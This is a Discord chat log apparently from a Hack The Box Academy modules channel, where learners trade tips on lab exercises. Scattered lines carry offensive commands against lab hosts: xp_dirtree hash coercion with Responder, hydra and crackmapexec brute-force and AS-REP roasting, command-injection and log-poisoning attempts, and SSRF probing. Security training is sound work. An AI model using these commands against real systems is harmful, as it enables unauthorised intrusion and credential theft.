#modules

It's not looking for a version #

That's not even close to the longest iirc someone said theirs was like 150

Either the question was not clear or I didn't understood it well. 😅

Thanks for the help with DNS, will be back later because i still dont get the results where i can work with.

Unclear question tbh

welcome to the cartel

Time to see how this course compares with Offsec and THM

They're leagues better than offsec (according to those that have done offsec)

I heard offsec course videos are very short and not much clear. Not sure if that's true.

For everyone I've spoken to, they said that the modules are sufficient and do a good job. But for me, I found them overwhelming and insufficient. That's why I'm using HTB

Hi Guys im trying to work on my report writing is there any module that goes in detail on how to figure out CVSS scores and how to place the vulnerabilities you find

https://academy.hackthebox.com/module/162/section/153

im doing this one and it just skims over how to format it whats good or bad but not if you have x vulnerability you could take theese steps to identify its severity etc

When we have completed (at least) two modules and are satisfied with our notes and documentation, we can select three different retired machines.

Is it saying to get a VIP so that I can practice after the modules?

i think it says that you can select 3 retired machines to practice on where dose it metntion vip ?

Oh so I get to select machines for free? That's cool

Time for some enumeration review

Nvm. Still another intro module left "Getting Started"

you bought it?

nice

Start now so we can race

And help each other

as soon as i reach hacker rank i think i'll buy it

I don’t think you get to do them for free, it just suggests that if you have vip you can practice on retired machines but ofc that’s optional

You get to do 1 for free

Following a guide, and using the IP, its just a seperate instance of a retired box i am pretty sure

But no endgame stuff for free ?

I’m working on the Protected Files page of the Password Cracking module.

The question asks to use the cracked password of the user Kira to log into the host and crack the password for the SSH key.

It assumes I have a cracked password for Kira (I don’t). || Should I be using hydra to brute-force ftp mutating the provided pass list in resources or did I miss something? ||

Retired machines require vip

You do have kiras password... you cracked it earlier in the module

Yes it's the same password...

It is in the mutated list from resources

I took several days to work through the PtH and PtT pages so my memory failed me there.

“Kira who?”

Well guess you gotta recheck the module

The linux and windows labs in this module get reused

So keep this in mind for future: save username/password combos

Good practice for reporting. 💯

It's early on iirc one of the first handful of sections

everything else beside active box / challenges and the first few box on starting point is require vip (prolabs are paid seperately)

does anyone here know what a RCe attack is?

Reverse Cringe Encryption

also known as based encryption

Unable to install mysql server in kali. Have tried several youtube videos. Anyone run into this?

You're better off creating a post in #1024429874246590575

I'll give that a go. Thanks

I'm so relieved

I just connected via the VPN for the first exercise and the connection is flawless

This means I will be able to go through this whole course and do boxes without technical issues

Hello all, i get big difficulties in the module Active Directory Enumeration & Attacks, Bleeding Edge Vulnerabilities. I tried all the 3 exploits, and I get bug on 2 of them, and the third (noPac) I can't get the file (my previous message was delete i dont understand why)

Probably due to containing spoilers

Can u help me through ?

can u tell us what u were trying to do and what steps have u done?
And cover up spoilers with **

Hello, I want to report a vulnerability to hackthebox. Can an authorized person contact me via LinkedIn?

Please help on question 1 of Attacking MSSQL I type commands "EXEC master..xp_dirtree '\10.10.110.17\share'
GO" and start responder but don't get hash in responder tun0 ...https://academy.hackthebox.com/module/116/section/1169

did u change the ip address to ur machine?

ye

have you tried subtree as well?

if i remeber right only one worked for me

no

when executing the command does it give any errors?

no

give it a try, I remeber having trouble with getting responder to get the hash

For noPac I get to the shell but i m limited to the semi-shell, I didn t find no command except ||copy||
For PetitPotam.py exploit I keep getting “200 OK” followed by HTTP headers and HTML in the body.
For Printnightmare, this command ||sudo smbserver.py -smb2support CompData /path/to/backupscript.dll|| dont finish i get a timeout

Try to remove the GO from the endEXEC master..xp_dirtree '\\10.10.*.*\share\'

Okay one second let me go through my notes

thx u ❤️

do I have to start a share in impacket can't responder work? and if responder method works what is the share? i just type IP only

I type GO on line 2

netdiscover? idk

same

I don't even know anything

OSINT?

no u don't have to have a share, just launch responder, and then type the command without the GO

idk why it doesn't work with the GO tbh

this is my responder command "sudo responder -I tun0" and it not working even with go

Hello, i just redid the question with noPac, I started with the scanner, and then continued with the exploit. it all worked out alright.
Can u walk me through the steps of ur noPac exploit.

Im working on password attacks module, at the Password Mutations section, I mutated the passwords.list with the custom.rule as told, then im trying to bruteforce smb and ssh "sam" user with it but it's taking long. Should I wait?

okay one sec, let's go all over it again.
1: u logged in with mssql.
2: u launched responder.
3: u executed EXEC master..xp_dirtree '\\10.10.*.*\share\
4: and u still haven't gotten the hash?

nmap scan the target and look for other services that u can bruteforce :)
Password reuse is a common thing uk

on line 3 of what you typed mine is `EXEC master..xp_dirtree '\10.10........ no \share\

alright, the only one that I didnt try is ftp I think so I will try with it too

Thanks!

np

it should work as it is, u just fill in ur IP address and it should work...

Yes try that one, you can also bump up the threads to make it run quicker 🙂

Since it's just one host I should not increase threads? Just bruteforce_speed right?

should I remove the quotes for the \IP?

It do work, but I didn' find no command to get the flag, except ||copy|| that|| copy it in the system32 folder|| If u have more command to share

Threads increase parallel processing (multiple attempts at once) which increases the speed

Any recommendation on how much threads to use?

2

oh okay, so u do get the shell, there's a command in windows called type it's like cat in linux :)

What’s this

💀 I’m new

Discuss modules that are part of the HTB Academy

Welcome on board :)))))

Ok💀

I’m not that smart 😭😭

mate have a look at the funderental modules on the academy, they will walk you through all the questions your asking, IP settings are different based on shell/OS

64

we all started somewhere 😄

64 won't work alright, it'll drop a lot

48 is the limit

certain protocols like ssh and rdp trip out with more but hydra will tell you, otherwise i stick on max

You sure about that?

Thanks to everyone for your answers, will do some test to get maximum performance!

yes yes

i tried cranking it up to 64, anything more than 48 and u start getting drops.
Idk why exactly tbh.

How come I got the flag with 64 threads then?

think certain protocols get overwhelmed

Yes it does not work

its very hit or miss

idk tbh, maybe it does vary.

one sec let me check again.

thanks u

np

Try hydra -l sam -P mut_password.list -t 64 ftp://10.129.X.X

The terminal

Are you using pwnbox?

nop

Default terminal in linux

Hello, I am learning BOF. I am stuck in "bad characters" concepts.
I think the "bad characters" will stop the function of the application.
So I need to find out which characters will stop.
Is my idea correct?
Could anyone can explain it?
Thanks.

thanks u i ll try again

Thanks, I'm trying!

Doing the RDP and SOCKS Tunneling with SocksOverRDP in pivot, tunneling & port forwarding module and keep getting this error

anytime, if it doesn't work out hmu.

Turn off real time protection

I know your screenshot didn't show but I can 99.9999% guarantee that would be the issue

I have turned it off.

It's separate from defender

I have turned it off

It's a seperate error from one you have responded to. I searched here first and have seen you respond

Then follow the section from top to bottom

I also can't upload a screenshot for whatever reason...fun

Because you haven't linked/verified your main htb account here

#welcome

It's to prevent mass image spam

This section goes a -> b -> c

C being the question login

no, this is an issue with the very first part importing the dll

let me verify to send a screenshot

i've restarted the machine too

Can you md5sum the zip file you transferred on both your system and the target?

yeah lemme check

yeah, good shout the transfer is messing it up.

will try a different transfer method.

thanks

Note I said the zip folders

Just in case that got confused

hello, I made a gobuster for the hidden folders but I don't understand why it doesn't want to show me a download folder. this one more precisely "http://provisions.snoopy.htb/download" I had to go on the internet to see that this file exists on the internet.

This isn't the place to ask about boxes, verify your account in #welcome and ask in #boxes

Yeah I have been transferring the zips and it's getting weird when I outfile it.

Good ol simple python http server has failed me

Ever since file transfer module had me set up a simple nginx server been using that since

can't it be access over ur local network as well?

it can but I'm also not worried about it too much as I'm only ever on htb vpn and don't open files I didn't download ¯_(ツ)_/¯

If I really wanted to be spook about it I'd change to nat network in vbox instead of bridged

But having it accessible on my local network allows me to verify if it's still running :)

if i have a user in the domain admin group What are the possible ways to get to administrator ??

Okay so re-transfered and sums match

same problem

oh okay nice

Try resetting the box then

done that twice

why would you want adminstrator when your domain admin

domain admin = pwned

Then try and follow the section top to bottom

Slowly

This is literally the second step "We can then connect to the target using xfreerdp and copy the SocksOverRDPx64.zip file to the target."

which is done, then loading it

Yes and you need to disable both defender and real-time protection OR add it to exclusions

which I have done

Are you sure?

Try adding it to exceptions

Yes because i don't have permission to read the root.txt flag in the Administrators Desktop

Use Google

@barren apex

that's domain user not domain admin

Are you running powershell as admin?

Hell Yeah

Nah

that one was for someone else

As a Print Operator

*not admin

What module are you doing

you need to do some kind of privesc, run whoami /priv and see what priviliges you have

Yeah i did that .. wait

Hello everyone I have a little problem and I need direction

Where does my help request go if I request help in a module?

https://www.hackthebox.com/blog/discord-lab-tutoring

Web proxies in repeating requests i have changed the request from ip=1 to ip=;ls; , in the previous challenge it was in flag.txt. Now it’s giving me the hint that it is in another directory. What i get is

flag.txt
index.html
node_modules
package-lock.json
public
server.is

But where ever i try to go like for example ;cd public; it gives me a bad request i think I’m not approaching this correctly so If anyone can help please

Hi guys, I'm in the "Pivoting, Tunneling, and Port Forwarding" : "Meterpreter Tunneling & Port Forwarding" & according 2 the explanation it doesn't work
some 1 had it 2?

One of the extra commands it gives if it's what I'm thinking you're referring to

I saw a mistake in that module already, so maybe there's another 1 ....

I had 0 issues following along when I did it

Bravo to base please send in air support

now it doesn't....

@fathom pendant any idea

No idea

Haven't done that one

The academy is so vague like use commands bro what commands 😭

Don't know what the question is asking you for

The ones you should have been learning throughout the module

Or at the very least you can try ls public

Probably due to the nature of the command syntax, you can't cd

Are u done the course @fathom pendant if so what was the hardest module(s)

Nope

How many have u completed so far

It is in using web proxies module and the section is repeating requests. Previously it was really easy i just had to intercept a request and then cat the flag.txt file. Now it says Try using request repeating to be able to quickly test commands. With that, try looking for the other flags and the hint is its not in the same directory. They didn’t even teach anything like how to shift between directories or anything they just showed how to repeat requests from history

Half was forces to take a break

Combine repeating requests with listing directories

That sucks. At least you're not time constrained to finish it. Unless u have a yearly plan or something

You know how to cat a file that isn't in the current directory yeah?

Personally I think windows priv esc was the hardest module in the course

It showed me two commands ;ls; which lists
flag.txt
index.html
node_modules
package-lock.json
public
server.is

Now I all that works is if I cat flag.txt it works. And if try ls public or cd public it gives me a bad request

I'm only 20% done on CPTS but could sense the danger from that module

most people say AD though

Do ls -la

AD shows 7 days that is probably the highest time among the modules idk but I'm thinking I should do Intro to AD before jumping into that but idk

AD is probably hardest if you're completely new because of how much information there was, but it's arguably the best module on Academy I've done so far.

Was AD hard on the exam?

Bad request

Interesting

¯_(ツ)_/¯

Might need url encoding

Password attacks might also fall in the category of hard because of how grueling those exercises were, even though it wasn't conceptually very difficult

I skipped it lol

Difficult to say

Id say no, but it was interwoven with other parts that I did find hard

Was the course enough or do u recommend also getting VIP to do the recommended boxes after each module?

None in the bug bounty program here?

I completed the course and then immediately started exam the next weekend

0 extra boxes 0 prolabs

Guys

you a pro?

Awesome. How long did it take you to finish the course

I also want to learn hacking

I wouldnt consider so. In my current planned roadmap of skills Im still in the beginner phase.

Took me about 9 months total. I had a couple months spread out where I took s break for life stuff

From where should I start?

But my standards are high. My beginner scale is apparently some others intermediate scale

https://academy.hackthebox.com/

if system cpts path if web cbbh path

@shut wraith thanks

if you program/script to me you're at least intermedite before you started

Is that because you took your time or do you think that the course deserves more than 2 months of work time

Both

Can I have your notes that you took throughout the course lol

Ive seen the stars that this field can go, so Im judging by how far it is to reach em

Absolutely not. The entire value of notes is that you make them yourself. Read up on some learning theory stuff.

This is my current notes format

Download obsidian

Did use any folder that you transfered over to windows machines which has all the tools for windows exploitation? Or did you get them on the fly during your exam

I have a tool that can download a bunch of scanning tools quickly if you want the link?

Yes please

https://github.com/AFrenchBanana/GaTS

Still a bit of a work in progress but you can quickly download a bunch of exploits, scanning scripts to targets connected to the internet

just need python installed

But that wont work

Because the target machines are not connected to the ineternet

Have you done the file transfer method?

module*

sI just started today

But I'm looking forward to it

theres loads of ways to get files to targets

Okay so I download the tools onto my attacker VM

and then I transfer based on operating system

Are there any restrictions against automation in the exam?

someone may correct me, but not that im aware off

But I dont want to get used to automation because its not allowed for OSCP

Your allowed enum scripts in OSCP, its just your not allowed tools like sqlmap that do stuff for you

Nop there isn't, the CPTS path shows u the manual method of doing everything first, then introduces u to the automated part, so I don't think you'll get used to automation

so i just spent like an hour on a question in the nmap module. turns out, the first command i tried in my kali VM (hyper-v) works perfectly in the pwnbox. Any reason for that?

Command: sudo nmap -sCU -p 53 target

On pwnbox i get the nsid of the DNS, which is the flag that i needed. On my kali vm i get nothing except the UDP port - open and TCP -filtered

theres always a few issues across kali/pwnbox, due to different versions, how they are set up etc

can some 1 help me in "Pivoting, Tunneling, and Port Forwarding" : "Meterpreter Tunneling & Port Forwarding" .....

Right, but if I'm attacking a client (hypotethically), would such an issue occur by using Kali? Or is it some specific HTB thing?

Thanks for the info and for your tool. I'm going to test it out soon

ive been meaning to sit down and add tools to it, will when i get some time and energy

theres multiple ways to enum protocols, knowing a few will help you

I created a payload just as explained in the page I delivered it just as they explained I run it just as they did but nothing happened ....

On the fly, never drop a file on the host unless its necessary

I'm trying 2 make a Meterpreter Session Establishment

is the proxy server running on msf?

exploit 50064 is not in msf for host -2 in thise module - https://academy.hackthebox.com/module/115/section/1139

not even go there it just doen't work

research how to add an exploit to msf

I know how. Thought it was in there aleady

thanks

have you selected the right payload on the multi handler

exactly as they did 1=1

did you set the LHOST correct, to you VPN ip, not theres and not your WAN?

the lhost is 0.0.0.0

on the payload is with the vpn

on the payload or MSF?

Change the LHOST to the same

did that already

LHOST and LPORT should match on the payload and multi handler

right...

& yet it doesn't work ...

DM me

.

The exploit was already in the msf path. Just needed to reload_all fyi if anyone gets lazy like me make sure to do this thanks @barren apex

There are several things that you have to do on order

File validation bypass is first
Then checking file
Correct extension bypass
Upload directory location

Give more details at what step are you right now

No way I thought you have to download it and add it manually that's is why I skipped this part 1 week ago

i just uploaded an png image, uploaded correctly, tried to know the location of it because it so i could validate the codes i want to try but didnt find a way, want to find source code with xss but still i need the location, with burp i didnt find any details about the file too, so basicly i am still at the starting point 😅

xss is not the right path here

did you check client side validation ?

In the crackmapexec module, section Asrep. crackmapexec ldap 10.129.204.177 -u userslist.txt -p '' --asreproast asreproast.out, i got this error (SMB 10.129.204.177 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:inlanefreight.htb) (signing:True) (SMBv1:False)
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/krb5/kerberosv5.py", line 61, in sendReceive
af, socktype, proto, canonname, sa = socket.getaddrinfo(targetHost, 88, 0, socket.SOCK_STREAM)[0]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/socket.py", line 962, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
socket.gaierror: [Errno -2] Name or service not known
). Then i found a solution of just adding --kdcHost in the beginning. But it's not working as shown in the module's section.

yes i did, i can bypass it

but the same issue, i cant find page

let me check something

okay

can I dm someone about CrackMapExec: Skills Assessment ?

hey mate, can you help with asrep section of it?

this is my issue

ldap cannot work with with an IP address, it's uses vhost and you should edit the /etc/hosts file

and the right command should be like that I guess crackmapexec ldap DC01.INLANEFREIGHT.LOCAL -u userslist.txt -p '' --asreproast asreproast.out

i added it in /etc/hosts and also tried with the domain but same issue

still nothing 😅

ah, i got it . what is wrong.

let me try it

or like that crackmapexec ldap dc01.inlanefreight.htb -u userslist.txt -p '' --asreproast asreproast.out

upper or lower case letters won;t matter too much

Dm me

and tell me if you got it

any one ?

crackmapexec ldap DC01.INLANEFREIGHT.LOCAL -u userslist.txt -p '' --asreproast asreproast.out
SMB DC01.INLANEFREIGHT.LOCAL 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:inlanefreight.htb) (signing:True) (SMBv1:False)
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/krb5/kerberosv5.py", line 61, in sendReceive
af, socktype, proto, canonname, sa = socket.getaddrinfo(targetHost, 88, 0, socket.SOCK_STREAM)[0]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/socket.py", line 962, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, flags):

same

/etc/hosts : # The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

10.129.204.177 DC01.INLANEFREIGHT.LOCAL

try to make like that 10.129.204.177 DC01.INLANEFREIGHT.LOCAL INLANEFREIGHT.LOCAL

okay

msfvenom has an android module doesnt it?

https://academy.hackthebox.com/module/143/section/1279

Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

Need some help for this question, I already got the domain admin for the one of the current user, and how could I remote it to DC01

my bad, it worked. I didn't checked the domain name, it was .LOCAL. as per the module and previous enumeration it was .HTB. But why captial letters works and small not?

WinRM?

ive made that mistake so many times lol

Thanks @sleek urchin

i noticed it while adding domain name in /etc/hosts

great, i honestly don't really know but just to be sure I try both

Hey I know i'm not supposed to ask questions here but do I have to download the ovpn file everytime I want to start a new machine?

You are welcome

no, unless you change server

okay, i will keep that in mind.

how...?

either evilwinrm or Enter-PSSession -ComputerName <machine name> -Credential <creds>

did you answer this question ? Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?

Ah alright, whenever I connect to the vpn on kali in virtualbox it doesn't show as connected. It only does this whenever I browse to the htb website in the vm and download the new ovpn file which is like the first step of the box.

But its not really a problem only a minor inconvenience

yes I answered this

make sure you don't have both the vpn your pwnbox on at the same time

read the #rules keep asking for thing like that and you will get the 👢

so this user has the ability to change any user's password { including DC admin password } without knowing its original password

DC = DC01 or Domain Controller?

after you change the admin password, you are able to login in DC01 and get the flag

DC01

actually it's the same, if I am not mistaken

https://academy.hackthebox.com/achievement/285625/158 this module was fun, wish there was one building upon this one

anyone can help me out this?

Are you the one from yesterday? Lol

Yeaaaa

Then you should know the answer

Lmfao

could you dm me?? thanks

yo @urban sage you there? sorry for the bugging you but pinged 2 mods yesterday and no one show up to scoop this clown up

#modules message
#modules message

https://media.discordapp.net/attachments/833542235621818418/1137461182672941066/image0.gif

Thanks for the heads up! @vital adder

With RDP and SOCKS Tunneling with SocksOverRDP is it supposed to go

Attack Host --> Pivot Host - 172.16.5.150 --> RDP to 2nd Pivot Host 172.16.5.19 --> RDP to Target 172.16.6.155

Looks right

Can someone give me a hint for Q Module: Footprinting, DNS, Last question?

@urban sage can you check your DMs pls

still need help for that...

I have added administrator to domain admin group, and it has genericall

but I cannot do Kerberoasting

I have no idea how to get the DC01's administrator username

if you haven't already dm him then it's better to add the reason why you want to, also it's better to take thing like this to #general and maybe also add your screenshot of the other clown there

DM

Yeah I have dmd him with the screenshot

hint run the tool on a ||subdomain||

🫡

thx. will use more wordlists then to find the sub

This is driving me insane. Anyone else get this error?

Yeah this was a pain for me

is it a setting I'm missing?

did you run the server exe as admin?

yeah I did

the cmd at the back needs to be on the other host no?

that's the one from the page

same right?

just to be clear are you saying that it needs to run on pivothost 1?

i cant remeber the IPs, But the socks over RDP server exe goes on the pivot host, then GUI one is on the host you want to connect from

Yeah that's what I have

Pivot host1 = sockoverrdp, Pivohost 2 = RDP server.exe + proxifier?

I think I had to close the Portable proxifer a few times and re configure and eventually it dropped in

ahhh

okay will try

thanks

it was proper glitchy for me

i think it connected for me twice and then disconnected, so i just RDP via the pivot host to get the flag once I knew I had achieved the aim

RDP in a RDP in a RDP lol

RDP inception

Did you ever get this?

I think that means windows is blocking the connection in realtime 👀

so the target is blocking me....fun times

will do this tomorrow I think

thanks for your help

If i remeber right....

I'm stuck here too - any hints?

hey guys, I'm stuck with Lab Hard from Password Attack module, I enumerated the target machine and found a RDP port , base on that and the user hint mentioned in the task, i tried to brute forced thru CrackmapExec the passwd but, the mut_password.list doesn't success....

what nmap scan did you run

nmap -p- --open -n -Pn -vv ipAddr

after that -sC & -sV

perhaps try UDP

why?, if the target is Windows.....

but, I will try it...

I cant remember exactly, but i think there was a unusal port open somewhere

hmm well, this is the UDP scan with no success

sudo nmap -sU -n -p- --max-retries 1 -vv 100.129.35.82

hi there I am working on PIVOTING, TUNNELING, AND PORT FORWARDING section socks 5 tunneling with chisel. The problem I encounter that I cannot run the freshly compiled chisel because the target system had not the right libc6 version.
my question can i compile chisel with the different version need for the libc6 ?

I tried that but nothing worked, so I just used another technique

so you can compile with an other libary version?

No, I used another pivoting technique cuz i couldnt get it to work, then i saw that someone said that it was a problem with the box so idk

What ports have you got open?

I think the new version of chisel has broken the box, and they haven't updated it yet . You can download an older version and it works if I remember right

Hey guys I wish to pursue the cloud security track at HacktheBox which modules should I complete first to begin with simple machines such as streamcloud?

PORT STATE SERVICE REASON VERSION
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
2049/tcp open mountd syn-ack 1-3 (RPC #100005)
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49679/tcp open msrpc syn-ack Microsoft Windows RPC
49680/tcp open msrpc syn-ack Microsoft Windows RPC
49681/tcp open msrpc syn-ack Microsoft Windows RPC

Ah yes, I remember. Have a look at the other services running.

I tried smb with no success as well

I was already downloading ubuntu 20.04 lts :p will try to find a version of chisel as well

Maybe there's something running on a different port 😉

ups I can't see it

Have you looked at the http service?

Hello

Is anyone up

I need help

hmm not

browser or nmap?

Browser. Try and connect to absolutely everything to work out whats running and how you might be able to utilise it

will do

Not Found

HTTP Error 404. The requested resource is not found.

in both http ports

Port 5985?

Which module do you need help with?

yes

let me see if the machines is not resposive

the machines is responding to ping si, it's up

but 5985 not found message

I'm going to reset it

man, I reset the machine and 5985 still not responding

I'm completely lost

I'll load it up quick, bare with

ok.

Whats the tool for scanning wordpress sites?

nvm it's just called wpscan lol

Check DMS

Compiling with an older linux version did the trick 😄

I have something to show the world, You must see this file. & Start reading from line 30 if you are lazy. on telegram search telegram akberxy. i can't uplaod it here that's why

for attacking common services > SMTP >Attacking Email Services, how are we supposed to leverage the credentials (the username and password) into logging into the email server? the module doesn't explicitly mention any tool or resource for doing this. i tried using thunderbird and populating the correct fields (mail server/ports/credentials), but i still couldn't access the email server with the correct credentials

The module does mention a means, but the wording could be better. Telnet using the appropriate port

thanks, this worked

Hey, @wispy aspen can you give me some tips on ethical hacking in dms? i have noticed you have a "Pro Hacker" role!

Rank doesn't mean that much. The platform has been out that long that people who played in 2018-2019 had a much easier time than people today (people also frequently cheat).

Not dissing SySinclair or anyone else here though, my point is that simply being here, engaging with people, and actually trying is all you need to learn.

Nah man, I don't know shit, I'm just stubborn and persistent

lol..

Friends i want to make a complain to the anonymous group..can anyone suggest me the process. And sorry to asking a personal question..it is most important for my life

And for my state too

guys, are the attacking passwords modules' skill assessments supposed to take long to solve?

i've solved the first one quickly but this second one looks like it might be a while before its solved.

Any tips on how to make it faster are appreciated.

No fuck off

looks like i forgot to enumerate the smb share, i think i figured it out.

parrot 5.3 is based on which debian version? and where can i see the docs? thank you

hey guys anybody knows why this SMB command doesn't work, when I type the passwd (brute forced previously ) for the user:
smbclient --user ||j***|| //<ipAddr>
This is from Lab Hard/Password Attack module

smbclient -L //server -U user

then write the prompted password

if it doesnt work use the smbclient.py and read the paramters by doing smbclient.py --help

^

ty

For the SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe) module. I am submitting the date that is being returned, but its invalid?? I am following all the instructions to a T

i havent done the module but have you tried diffrent time formats?

for example 01012023 instead of 112023

yup

ah then i cant really help you more as you have probably way more experience as i do, i joined like 2 months ago haha

well once u do it let me know

alright

also, sure i may have been in here longer than u but that doesnt mean i know more :) we are all here to help eachother !

True, thanks and I'll try to help more people even though I'm just starting, although I can say I'm mid way through cpts in 2 months haha

It's tough but I love it, this platform is really fun, I'm trying to do it in less than 4 months just as a challenge.

Broken Authentication Skills Assessment: https://tenor.com/view/what-why-huh-steve-harvey-confused-gif-17449734

gl!

Doing Pivot Tunnelling Module & The Socks Over RDP challenge keeps stumping me. I keep getting this erro and proxifier keeps failing. Does anyone have any idea?

I've reset this lab 3 times & waited 10 mins before connecting etc

Ignore me, my idiocy knows no bounds

You probably have this error because you wrote the wrong IP

where do we find the passwords.txt file for Kerberoasting module in the Attackbox?

Try rockyou

find / -name "rockyou.txt" 2> /dev/null

in Resources on top of the section

ok thanks

I want to learn how
TCP or UDP payload will be generated

is it possible again to give where im at and what im thinking for whitebox attacks skills assessment to see if im in the ball park?

Sure.

Module: "Getting Started
Chapter: Public Exploits
Question:

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

Hint:

Search for plugin exploits

The web app on the host is wordpress. And the hint confirms that the exploit has to do with a wordpress plugin. So I searched on google "wordpress plugin exploit". I also searched on searchsploit and metasploit.

But there are countless results even when I specify the version which is 5.6.1. How do I know which exploit to use? Can you please help.

SOLVED:
The web app says the plugin.

Hey

Hi, can you tell me how you managed to generate dictionaries for user and pass. I'm using cuppa and username_anarchy. I shorten the password dictionary according to the hint and unfortunately I still don't get the right data, besides brute force lasts over an hour.

Hi:)

Hii

Wait whete

Where are

You all from

So for now, I'm dead. I created the dictionaries according to the information and unfortunately nothing goes through. Thanks for the answer

Hi all, I’m on the Using Web Proxies Skills Assessment. I’ve done Q2, 3 and 4 fine but Q1, enabling the disabled button is sticking me. I’ve tried popping getflag=true at the bottom of my request but that doesn’t work, also tried putting it at the top after lucky.php/?. Anyone able to nudge please?

I’m using Inspector to enable it and forwarding that through the proxy to intruder but it just doesn’t seem to like it

Got it, anyone else stuck on this one, you need to click loads in repeater, you aren’t going crazy haha

good morning all

i'm doing the hard lab assessment on the password craccking

i keep getting this error when i try and run lazagne.exe

all tips on how i should run it ?

try .\lazagne.exe all

thanks

lol no passwords found

Hi I wanted to know if anyone could help me out with this: who can help me this https://academy.hackthebox.com/module/116/section/1466

you've posted an entire module, try reviewing the module and asking your question for better guidance

Oh my bad sorry, I was needing help with Attacking Common Services - Easy Lab

What have you tried and what exactly is not working?

Is this stupid I'm trying to transfer LinPeas in base 64 to my target host but it's massive

I tried to start a python server and transfer with wget but I couldn't connect to my attacker vm from the host machine (yes I used tun0 VPN IP )

Are you connected via ssh? You could use scp then

Okay I'll try that. But I'm worried I wont have that option on all boxes

Do you have access to create a file?

Yes

Can you edit that file with vi or nano?

You're write, I should just copy the file since it's not a binary

LinPEAS is a python script

Yes

nvm it is binary

Excited 😄

I would recommend opening up the linpeas.sh in your kali VM, copying its contents, going to your established shell, opening nano, and pasting its contents. If that doesn't work, there is a File Transfers module in HTB Academy with a plethora of options

Hi there, I am learning Linux BOF through the Linux BOF module.
I have solved the Skills Assessment but I have question.
I must use ||./leave_msg payload|| in the bash to get root.
Why can't I get the root when I run the shellcode in the gdb?

so guys.. i found this SSRF vul.. it calls back and it actually dumps the file content.. the system is Windows..
Please any idea on how to exploit this more ?

You can try fetching web server files of the remote server.

which module and section are you on?

A webpage or subdomain that is only accessible to internal users.

Yeah i tried that for ex. it rendered the index.php file but i got no ideas of the files in the web server

I'd suggest you to enumerate more, check your nmap scan. Try fetching something that is running on another port?

tried brute forcing and found nothing

yeah! let me try more

Hey bro! that actually worked

i tried accessing the port 5000 like 10.10.10.239:5000 but i got access denied and then i used the local ip

pls take this to #boxes if you are on the love box

hello guys
if anyone need a job support ping me guys

Hi, can someone explain the difference between -Pn and --disable-arp-ping?

Hello can someone help. I am user 1 what is the command using su to switch to user 2. This is the output of sudo -l:

        ng-519917-gettingstartedprivesc-frc5g-f5b6cf4fc-54kn9:
    (user2 : user2) NOPASSWD: /bin/bash

if no passwrd sudo su user2

Thanks I just got it

hello. I am at the Skills Assessment - File Inclusion https://academy.hackthebox.com/module/23/section/513
I am at the RCE part. I am poisoning the log and it isn't working. I managed to change the user agent to an example word but when I try the PHP shell code nothing works and I think it breaks the target and I have to keep resetting.

try with single quotes

https://chat.openai.com/share/6fe13175-5692-45a9-8e99-d8bc84f19142

how did you know because I am literally trying that right now????

trial and error

Hi, can someone help me with the Window Priv Esc module for the Server Operators section? I got the last part where you get the hashes and I'm trying to pass the hash using psexec. Not sure if im using the right syntax but it doesnt seem to work:

I still can't cat the flag

it keeps going blank and I keep resetting the target

I dont get it, it worked for "&cmd=ls+/" before and now when I try again the same exact way after refreshing the target it goes blank

I tried chatgpt but I don't understand the definition of arp ping. Ping uses ARP well in order to be able to ping the target, if I disable with --disable-arp-ping I no longer have any use for using -Pn

0 idea but running a couple command is work fine for me

ITS RIGGED

😭

if you don't understand the definition of arp ping just google it

if that's the admin hash then you may want to remove that screenshot due to spoiler

I looked at the nmap doc and didn't understand

OMG it keeps going blank its so STUPID

both of you don't need to add that part here 🤣

but if you have the admin hash try with something like evil-winrm if there is winrm or use cme to confirm there is smb and that's the right hash also psexec is given you an connection error

ITS BROKEN

spamming the issue isn't going to fix it

try restart the target machine

i reset it 20 times going straight to Burp

the only command I am sending is catting the flag

I use single quaotes and it goes blank

I tried refreshing it so many times and not touching it except for that one flag

its fucking broke man

just give it a try and got the flag still in the same firefox f12

I WANT MY MONEY BACK ITS RIGGED 😭 😭 😭

Your shift key is broken
You can not hack this way

I read it 2 times but I couldn't understand what the issue is

He is getting blank flag ?

Or no output at all ?

Probably not forwarding the request fully in burpsuite

theyre looking at the webpage

instead of doing it through burp

like a blank admin panel

Man 1 think about HTB is you need 60% thinking skills to solve a lab

I tried in repeater too

Check repeater output

oh yea i didn't think of that why tf are you looking in the admin panel for the output??

The Response area in Repeater right?

can i DM you?

sure

blank as in 500 Internal Server Error

in the repeater

try the network tab in firefox f12 like i did 🤣

all I get is 500 Internal Server Error

I am done

its always something with these modules

[HELP]
I have noticed that the Penetration Testing Process module has been updated. How can I identify the new additions or easily locate where the updates have been applied?

